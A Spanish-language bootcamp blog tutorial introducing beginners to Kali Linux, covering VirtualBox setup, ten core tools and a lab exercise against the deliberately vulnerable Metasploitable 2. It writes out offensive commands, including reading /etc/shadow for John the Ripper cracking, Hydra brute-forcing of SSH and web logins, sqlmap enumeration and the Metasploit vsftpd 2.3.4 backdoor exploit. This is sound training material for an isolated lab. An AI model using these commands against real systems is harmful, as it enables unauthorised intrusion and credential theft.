Saltar al contenido

Próxima edición 7 de septiembre de 2026

Volver al blog

Kali Linux para principiantes: Instalación, herramientas y primer hack

Escritorio de Kali Linux ejecutándose dentro de VirtualBox con una terminal mostrando resultados de un escaneo Nmap

Aprende Kali Linux desde cero con este tutorial para principiantes. Instálalo en VirtualBox, explora las 10 herramientas principales y realiza tu primera prueba de penetración en Metasploitable.

Daute Delgado
13 min de lectura
  • Offense
  • Pentesting
  • Skills
  • Mindset
  • Confidence
Compartir este artículo:

TL;DR

Kali Linux es la distribución estándar de la industria para pruebas de penetración, precargada con más de 600 herramientas de seguridad utilizadas por hackers éticos y profesionales de seguridad en todo el mundo. Este tutorial guía a principiantes a través de la instalación de Kali en VirtualBox, la navegación del entorno de escritorio, la comprensión de las 10 herramientas esenciales y la realización de un primer ejercicio práctico escaneando una máquina virtual Metasploitable. No se requiere experiencia previa en Linux, solo curiosidad y disposición para aprender haciendo.

Era la noche anterior a la primera competición Capture the Flag de su universidad, y Priya tenía un problema. Había estudiado teoría de redes durante meses, memorizado el modelo OSI y podía recitar reglas de firewall de memoria. Pero nunca había escaneado una red realmente, nunca había interceptado un paquete, nunca había explotado un servicio vulnerable. Su compañero de equipo le entregó una unidad USB y dijo: "Arranca con esto. Tiene todo lo que necesitas."

Esa unidad USB contenía Kali Linux. En dos horas, Priya había descubierto puertos abiertos en el servidor de práctica, identificado una aplicación web mal configurada y usado una inyección SQL para capturar su primera flag. Quedó tercera en la competición al día siguiente. No porque se convirtiera en experta de la noche a la mañana, sino porque Kali le dio las herramientas para convertir la teoría en práctica.

Esa transformación, de saber sobre seguridad a realmente hacer seguridad, es lo que Kali Linux permite. Y comienza con instalarlo.

Qué es Kali Linux y por qué importa

Kali Linux es una distribución Linux basada en Debian diseñada específicamente para pruebas de penetración, investigación de seguridad y análisis forense digital. Mantenida por OffSec (la organización detrás de la certificación OSCP), Kali incluye más de 600 herramientas de seguridad preinstaladas organizadas en categorías: recopilación de información, análisis de vulnerabilidades, pruebas de aplicaciones web, ataques de contraseñas, ataques inalámbricos, explotación y forense.

Lo que hace a Kali diferente de instalar herramientas individuales en Ubuntu o Fedora es la integración. Cada herramienta está preconfigurada, las dependencias están resueltas y todo el sistema está construido alrededor del flujo de trabajo de un profesional de seguridad. El kernel incluye parches para inyección inalámbrica. Los repositorios contienen versiones de herramientas probadas para compatibilidad. El entorno de usuario por defecto está configurado para pruebas de penetración, no para productividad de escritorio.

Más del 80% de los pentesters profesionales usan Kali como su distribución principal de pruebas. Cuando las ofertas de empleo mencionan "dominio de herramientas de seguridad estándar de la industria", casi siempre se refieren a herramientas que vienen con Kali. Cuando exámenes de certificación como el OSCP te proporcionan un entorno de pruebas, ejecuta Kali.

Esto no es un juguete. Es un kit de herramientas profesional. Y es completamente gratuito.

Instalando Kali Linux en VirtualBox

Ejecutar Kali dentro de una máquina virtual es el enfoque más seguro y práctico para principiantes. Mantienes tu sistema operativo principal intacto, puedes tomar snapshots antes de experimentos arriesgados y puedes eliminar todo el entorno y empezar de nuevo si algo sale mal.

Paso 1: Descargar e instalar VirtualBox

Descarga VirtualBox desde virtualbox.org. Elige el paquete para tu sistema operativo host (Windows, macOS o Linux) y sigue el instalador. Acepta la configuración por defecto. La instalación toma aproximadamente cinco minutos.

Paso 2: Descargar la imagen de Kali Linux

Visita kali.org/get-kali y descarga la imagen preconstruida para VirtualBox. Es un archivo .ova que contiene una instalación de Kali completamente configurada. La descarga es de aproximadamente 3.5 GB.

Usar la imagen preconstruida en lugar del instalador ISO ahorra un tiempo significativo. El OVA viene con VirtualBox Guest Additions ya instaladas, lo que significa que el portapapeles compartido, la transferencia de archivos por arrastrar y soltar y el redimensionamiento automático de pantalla funcionan inmediatamente.

Paso 3: Importar la imagen

Abre VirtualBox, haz clic en Archivo > Importar servicio virtualizado, selecciona el archivo .ova descargado y haz clic en Importar. Antes de iniciar la máquina, ajusta estas configuraciones:

code
System > Motherboard > Base Memory: 4096 MB (minimum 2048)
System > Processor > CPU: 2 cores
Display > Screen > Video Memory: 128 MB
Network > Adapter 1 > Attached to: NAT

La configuración de red NAT da a tu VM de Kali acceso a internet a través de tu máquina host mientras la mantiene aislada de tu red local. Esto es importante para la experimentación segura.

Paso 4: Primer arranque

Inicia la máquina virtual. Kali arranca a una pantalla de inicio de sesión. Las credenciales por defecto para la imagen preconstruida son:

code
Username: kali
Password: kali

Después de iniciar sesión, abre una terminal (el icono de rectángulo negro en la barra de tareas) y actualiza el sistema:

bash
sudo apt update && sudo apt upgrade -y

Esto asegura que todas las herramientas estén en sus últimas versiones. La actualización puede tomar de 10 a 20 minutos dependiendo de tu conexión a internet.

Kali usa el entorno de escritorio Xfce por defecto. Es ligero y rápido, lo que importa cuando estás ejecutando dentro de una VM. Los elementos clave son:

El panel superior contiene el menú de Aplicaciones (organizado por categoría de seguridad), el cambiador de espacios de trabajo y la bandeja del sistema. El panel inferior muestra tus ventanas abiertas. El escritorio es intencionalmente minimal porque la mayoría del trabajo ocurre en la terminal.

Abre el menú de Aplicaciones y explora las categorías. 01 Information Gathering contiene herramientas de reconocimiento. 05 Password Attacks contiene utilidades de cracking. 09 Sniffing & Spoofing incluye herramientas de interceptación de red. Esta organización coincide con las fases de una prueba de penetración, desde el reconocimiento hasta la explotación y el informe.

El gestor de archivos, el navegador web (Firefox ESR) y el editor de texto (Mousepad) están bajo la categoría Usual Applications. Usarás Firefox frecuentemente para pruebas de aplicaciones web junto con Burp Suite.

Las 10 herramientas principales de Kali Linux que todo principiante debe conocer

Kali viene con cientos de herramientas, pero dominar estas diez cubre los fundamentos del hacking ético. Cada una se corresponde con una fase específica de una prueba de penetración.

1. Nmap (Network Mapper)

Nmap es la herramienta de reconocimiento más importante en ciberseguridad. Descubre hosts en una red, identifica puertos abiertos, detecta servicios en ejecución y sus versiones, e incluso identifica sistemas operativos.

bash
# Basic scan of a target
nmap 192.168.1.100

# Service version detection
nmap -sV 192.168.1.100

# Operating system detection (requires root)
sudo nmap -O 192.168.1.100

# Aggressive scan: OS detection, version, scripts, traceroute
sudo nmap -A 192.168.1.100

Nmap puede escanear los 65,535 puertos TCP en un objetivo de red local en menos de 60 segundos usando el modo de escaneo SYN (-sS). Es la primera herramienta que ejecutas en cada proyecto porque no puedes atacar lo que no puedes ver.

2. Burp Suite (pruebas de aplicaciones web)

Burp Suite es un proxy de interceptación que se sitúa entre tu navegador y una aplicación web. Captura cada solicitud y respuesta HTTP, permitiéndote inspeccionar, modificar y reproducir tráfico. La Community Edition viene preinstalada en Kali.

Lánzalo desde Applications > 03 Web Application Analysis > Burp Suite. Configura Firefox para enrutar el tráfico a través del proxy de Burp (127.0.0.1:8080), y cada solicitud web se vuelve visible y editable. Así es como encuentras inyecciones SQL, cross-site scripting y bypasses de autenticación en aplicaciones web.

3. Metasploit Framework

Metasploit es el framework de explotación más utilizado del mundo. Contiene una base de datos de exploits conocidos para sistemas operativos, servicios y aplicaciones. Seleccionas una vulnerabilidad objetivo, configuras el exploit, eliges un payload (el código que se ejecuta después de la explotación) y ejecutas.

bash
# Launch the Metasploit console
msfconsole

# Search for exploits targeting a specific service
search vsftpd

# Use an exploit
use exploit/unix/ftp/vsftpd_234_backdoor

# Set the target
set RHOSTS 192.168.1.100

# Execute
exploit

Metasploit transforma vulnerabilidades teóricas en impacto demostrado. Cuando un cliente pregunta "¿qué tan grave es realmente esta vulnerabilidad?" Metasploit proporciona la respuesta.

4. John the Ripper (cracking de contraseñas)

John the Ripper descifra hashes de contraseñas usando ataques de diccionario, fuerza bruta y métodos híbridos. Cuando extraes hashes de contraseñas de un sistema comprometido, John determina las contraseñas originales.

bash
# Crack Linux shadow file hashes
sudo unshadow /etc/passwd /etc/shadow > hashes.txt
john hashes.txt

# Use a specific wordlist
john --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt

# Show cracked passwords
john --show hashes.txt

La wordlist rockyou.txt viene incluida con Kali y contiene más de 14 millones de contraseñas reales de una filtración de datos de 2009. Descifra un porcentaje sorprendente de contraseñas en la mayoría de los proyectos, que es exactamente la razón por la que las políticas de contraseñas fuertes importan.

5. Aircrack-ng (auditoría inalámbrica)

Aircrack-ng es un conjunto de herramientas para probar la seguridad de redes inalámbricas. Captura tráfico inalámbrico, desautentica clientes para forzar la captura del handshake y descifra claves WPA/WPA2 mediante ataques de diccionario. Las pruebas inalámbricas requieren un adaptador inalámbrico compatible que soporte modo monitor e inyección de paquetes.

6. SQLMap (automatización de inyección SQL)

SQLMap automatiza la detección y explotación de fallos de inyección SQL. Apúntalo a una URL con parámetros y prueba la inyección, identifica el tipo de base de datos y puede extraer tablas, columnas y datos.

bash
# Test a URL parameter for SQL injection
sqlmap -u "http://target.com/page?id=1" --dbs

# Enumerate tables in a specific database
sqlmap -u "http://target.com/page?id=1" -D database_name --tables

7. Hydra (ataques de contraseñas en línea)

Hydra realiza ataques de fuerza bruta en línea contra servicios de red: SSH, FTP, HTTP, SMB, RDP y docenas más. A diferencia de John the Ripper que descifra hashes offline, Hydra intenta intentos de inicio de sesión reales contra servicios activos.

bash
# Brute force SSH login
hydra -l admin -P /usr/share/wordlists/rockyou.txt ssh://192.168.1.100

# Brute force web login form
hydra -l admin -P passwords.txt 192.168.1.100 http-post-form \
  "/login:user=^USER^&pass=^PASS^:Invalid credentials"

8. Wireshark (análisis de paquetes)

Wireshark captura y analiza tráfico de red a nivel de paquete. Te muestra exactamente qué datos atraviesan la red: consultas DNS, solicitudes HTTP, intentos de autenticación y transferencias de archivos. En Kali, se integra con otras herramientas para proporcionar visibilidad de cómo se ven tus ataques en la red.

9. Nikto (escáner de servidores web)

Nikto escanea servidores web en busca de vulnerabilidades conocidas, configuraciones incorrectas y software desactualizado. Verifica archivos peligrosos, instalaciones por defecto y cabeceras de servidor inseguras.

bash
# Scan a web server
nikto -h http://192.168.1.100

Nikto es ruidoso. Genera cientos de solicitudes y es fácilmente detectado por sistemas de detección de intrusiones. Eso lo hace inadecuado para proyectos de sigilo pero excelente para el descubrimiento completo de vulnerabilidades en pruebas autorizadas.

10. Gobuster (fuerza bruta de directorios)

Gobuster descubre directorios y archivos ocultos en servidores web mediante fuerza bruta de rutas usando una wordlist. Las aplicaciones web frecuentemente contienen paneles de administración, archivos de respaldo, endpoints de configuración y artefactos de desarrollo que no están enlazados desde la interfaz pública pero siguen siendo accesibles.

bash
# Enumerate directories
gobuster dir -u http://192.168.1.100 -w /usr/share/wordlists/dirb/common.txt

# Enumerate with file extensions
gobuster dir -u http://192.168.1.100 -w /usr/share/wordlists/dirb/common.txt -x php,html,txt

Tu primer ejercicio práctico: Escaneando Metasploitable

La teoría solo llega hasta cierto punto. La forma más rápida de aprender Kali es usarlo contra un sistema diseñado para ser hackeado. Metasploitable 2 es una máquina virtual Linux deliberadamente vulnerable creada por Rapid7. Contiene más de 30 servicios mal configurados, contraseñas débiles y aplicaciones explotables, todo en un entorno seguro y aislado.

Configurando Metasploitable

Descarga Metasploitable 2 desde VulnHub o SourceForge. Viene como un archivo .vmdk. Crea una nueva VM en VirtualBox:

  1. Haz clic en New, nómbrala "Metasploitable", selecciona Linux / Ubuntu (64-bit)
  2. Asigna 512 MB de RAM (necesita muy poca)
  3. Selecciona Use an existing virtual hard disk file y elige el .vmdk descargado
  4. Antes de iniciar, cambia el adaptador de red a Host-only Adapter

Cambia el adaptador de red de tu VM de Kali al mismo Host-only Adapter. Esto crea una red aislada donde ambas máquinas pueden comunicarse sin exponer Metasploitable a internet. Nunca conectes Metasploitable a una red real. Sus vulnerabilidades son intencionales y graves.

Arranca Metasploitable (login: msfadmin / msfadmin) y anota su dirección IP:

bash
ifconfig

Ejecutando tu primer escaneo

De vuelta en tu terminal de Kali, comienza con el descubrimiento de hosts para confirmar que puedes alcanzar el objetivo:

bash
ping -c 4 <metasploitable-ip>

Ahora ejecuta un escaneo Nmap completo:

bash
sudo nmap -sV -sC -O <metasploitable-ip>

Los flags significan: -sV detecta versiones de servicios, -sC ejecuta scripts NSE por defecto para enumeración adicional, y -O intenta identificar el sistema operativo. La salida revelará docenas de puertos abiertos y servicios en ejecución:

code
PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         vsftpd 2.3.4
22/tcp   open  ssh         OpenSSH 4.7p1
23/tcp   open  telnet      Linux telnetd
80/tcp   open  http        Apache httpd 2.2.8
445/tcp  open  netbios-ssn Samba smbd 3.X
3306/tcp open  mysql       MySQL 5.0.51a
...

Cada puerto abierto representa una superficie de ataque. La versión vsftpd 2.3.4 es particularmente notable porque contiene una famosa vulnerabilidad de backdoor. Las versiones desactualizadas de SSH, Apache y MySQL tienen todas exploits conocidos.

Explorando la aplicación web vulnerable

Abre Firefox en Kali y navega a http://<metasploitable-ip>. Verás una página listando varias aplicaciones web intencionalmente vulnerables, incluyendo DVWA (Damn Vulnerable Web Application), Mutillidae y TWiki.

Ejecuta Nikto contra el servidor web:

bash
nikto -h http://<metasploitable-ip>

Luego usa Gobuster para encontrar directorios ocultos:

bash
gobuster dir -u http://<metasploitable-ip> -w /usr/share/wordlists/dirb/common.txt

Compara lo que Gobuster encuentra con lo que está enlazado en la página principal. Probablemente descubrirás directorios y archivos que no estaban listados públicamente. Este es el valor principal de la fuerza bruta de directorios: encontrar lo que los desarrolladores intentaron ocultar pero no lograron proteger.

Intentando tu primer exploit

Con los resultados de Nmap mostrando vsftpd 2.3.4 en el puerto 21, lanza Metasploit:

bash
msfconsole

Busca un exploit conocido:

bash
search vsftpd

Metasploit devolverá el módulo exploit/unix/ftp/vsftpd_234_backdoor. Este exploit apunta a un backdoor que fue insertado en el código fuente de vsftpd 2.3.4 en 2011. Configúralo y ejecútalo:

bash
use exploit/unix/ftp/vsftpd_234_backdoor
set RHOSTS <metasploitable-ip>
exploit

Si el exploit tiene éxito, tendrás un shell de comandos en el sistema objetivo. Escribe whoami y verás root. Acabas de lograr un compromiso total del sistema en tu primer objetivo. Tómate un momento para apreciar lo que ocurrió: identificaste un servicio, encontraste una vulnerabilidad conocida, seleccionaste un exploit y obtuviste acceso no autorizado. Esto es lo que los pentesters hacen profesionalmente, excepto que lo hacen con autorización y luego ayudan a las organizaciones a corregir las debilidades que descubren.

Construyendo tu laboratorio de práctica

Metasploitable es solo el comienzo. Una vez que estés cómodo con el escaneo y la explotación básicos, expande tu laboratorio con máquinas vulnerables adicionales de VulnHub. Comienza con máquinas clasificadas como "Easy" y ve subiendo. Cada máquina enseña diferentes habilidades: explotación de aplicaciones web, escalación de privilegios, cracking de contraseñas o pivoting en red.

Tu laboratorio de práctica siempre debe estar aislado en una red host-only. Nunca conectes máquinas intencionalmente vulnerables a tu red doméstica o a internet. Las vulnerabilidades son reales, y una máquina Metasploitable expuesta será comprometida por escáneres automatizados en cuestión de minutos.

Del laboratorio a la carrera profesional

Kali Linux es un medio, no un fin. Las herramientas te enseñan pensamiento de seguridad ofensiva: cómo los atacantes encuentran debilidades, encadenan exploits y se mueven a través de redes. Ese conocimiento es valioso ya sea que termines en el lado ofensivo (pruebas de penetración, red teaming) o en el lado defensivo (análisis SOC, respuesta a incidentes, seguridad de redes).

El camino desde tu primer escaneo Nmap hasta una carrera en ciberseguridad sigue un patrón. Domina los fundamentos en tu laboratorio casero. Documenta tu aprendizaje a través de writeups y publicaciones en blogs. Busca formación estructurada que llene las lagunas de conocimiento. Obtén certificaciones que validen tus habilidades. El OSCP de OffSec, que evalúa a los candidatos en un examen práctico de 24 horas usando herramientas de Kali Linux, es ampliamente considerado como el estándar de referencia para los pentesters.

Todo pentester profesional recuerda el momento en que su primer exploit tuvo éxito. El momento en que la terminal devolvió root@metasploitable. Esa mezcla de emoción y "espera, ¿fue tan fácil?" es exactamente el sentimiento que impulsa a las personas a dedicar sus carreras a encontrar y corregir estas debilidades antes de que lo hagan los actores maliciosos.

Tu VM de Kali está esperando. Ábrela. Escanea algo. Rompe algo. Luego descubre cómo defenderte contra lo que acabas de hacer. Así es como se forman los profesionales de ciberseguridad.

Sobre el autor
Daute Delgado, Founder & Bootcamp Director at Unihackers
Daute Delgado

Fundador de Unihackers

Una década defendiendo aerolíneas, SOCs y organizaciones internacionales

Daute fundó Unihackers tras una década defendiendo aerolíneas, SOCs gestionados y organizaciones internacionales. Es Associate C|CISO y voz habitual sobre IA y ciberseguridad en medios internacionales. Silver Winner en los Cyber Security Excellence Awards 2021. Enseña como le habría gustado que le enseñasen a él: sin ruido, entrenando lo que los atacantes hacen de verdad y formando profesionales útiles desde el primer día.

Ver perfil
Comienza tu camino

¿Listo para iniciar tu carrera en ciberseguridad?

Únete a cientos de profesionales que han hecho la transición a la ciberseguridad con nuestro bootcamp práctico.

Comienza tu camino

¿Listo para iniciar tu carrera en ciberseguridad?

Únete a cientos de profesionales que han hecho la transición a la ciberseguridad con nuestro bootcamp práctico.

Horas
360+
Vacantes UE abiertas
300K+
Salario medio
$85K
Explorar el bootcamp